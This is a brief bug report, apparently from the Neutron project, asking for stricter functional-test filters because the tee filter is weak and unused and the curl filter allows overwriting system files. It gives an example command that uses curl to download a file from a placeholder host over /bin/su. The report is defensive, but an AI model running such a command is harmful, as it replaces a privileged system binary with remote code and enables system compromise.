  We need more strict filters for functional tests

Status in neutron:
  Fix Released

Bug description:
  Currently tee utility not used in functional tests, but filters for it (very weak) are existing in functional-testing.filters . Also, in the current state curl filter allows to use curl for replacement system files, like: curl -o /bin/su http://mycoolsite.in/my-virus-needs-suid
  We need more strict filters to be set for functional tests.
